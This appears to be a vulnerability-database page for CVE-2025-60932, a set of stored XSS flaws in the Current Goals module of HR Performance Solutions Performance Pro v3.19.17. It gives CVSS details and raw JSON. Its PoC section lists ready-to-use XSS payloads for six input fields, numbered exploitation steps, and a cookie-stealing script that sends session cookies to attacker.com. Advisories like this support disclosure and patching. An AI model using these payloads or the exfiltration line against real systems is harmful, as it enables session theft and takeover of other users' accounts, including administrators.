Security Vulnerability Report
CVE-2025-60932 CVSS 6.1 MEDIUM

CVE-2025-60932

Published: 2025-10-21 15:15:39
Last Modified: 2026-04-15 00:35:42

Description

Multiple stored cross-site scripting (XSS) vulnerabilities in the Current Goals function of HR Performance Solutions Performance Pro v3.19.17 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Goal Name, Goal Notes, Action Step Name, Action Step Description, Note Name, and Goal Description parameters. The patched version is PP-Release-6.3.2.0.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

HR Performance Solutions Performance Pro v3.19.17
HR Performance Solutions Performance Pro < PP-Release-6.3.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CVE-2025-60932 PoC - Stored XSS in Performance Pro Current Goals
     Affected Parameters: Goal Name, Goal Notes, Action Step Name,
     Action Step Description, Note Name, Goal Description -->

<!-- Payload examples for each vulnerable parameter -->

<!-- 1. Goal Name parameter -->
<script>alert('XSS-GoalName-'+document.domain)</script>

<!-- 2. Goal Notes parameter -->
<img src=x onerror="alert('XSS-GoalNotes-'+document.cookie)">

<!-- 3. Action Step Name parameter -->
<svg onload=alert('XSS-ActionStepName')>

<!-- 4. Action Step Description parameter -->
<body onload="alert('XSS-ActionStepDesc')">

<!-- 5. Note Name parameter -->
<input onfocus=alert('XSS-NoteName') autofocus>

<!-- 6. Goal Description parameter -->
<iframe src="javascript:alert('XSS-GoalDesc')"></iframe>

<!-- Exploitation steps:
     1. Authenticate to Performance Pro v3.19.17
     2. Navigate to Current Goals module
     3. Create a new Goal or edit an existing one
     4. Inject one of the above payloads into the corresponding parameter field
     5. Save the Goal/Action Step/Note
     6. When any user (especially admin) views the affected Goal page,
        the malicious script executes in their browser context
     7. Attacker can steal session cookies, perform actions as the victim,
        or pivot to further attacks -->

<!-- Cookie stealing payload example (for demonstration only) -->
<script>new Image().src="http://attacker.com/steal?c="+document.cookie</script>
```

References

https://docs.offsecguy.com/cve/hr-performance-solutions/vulnerability/reflected-xss-current-goals
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-60932", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:39.330", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple stored cross-site scripting (XSS) vulnerabilities in the Current Goals function of HR Performance Solutions Performance Pro v3.19.17 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Goal Name, Goal Notes, Action Step Name, Action Step Description, Note Name, and Goal Description parameters. The patched version is PP-Release-6.3.2.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://docs.offsecguy.com/cve/hr-performance-solutions/vulnerability/reflected-xss-current-goals", "source": "[email protected]"}]}}
```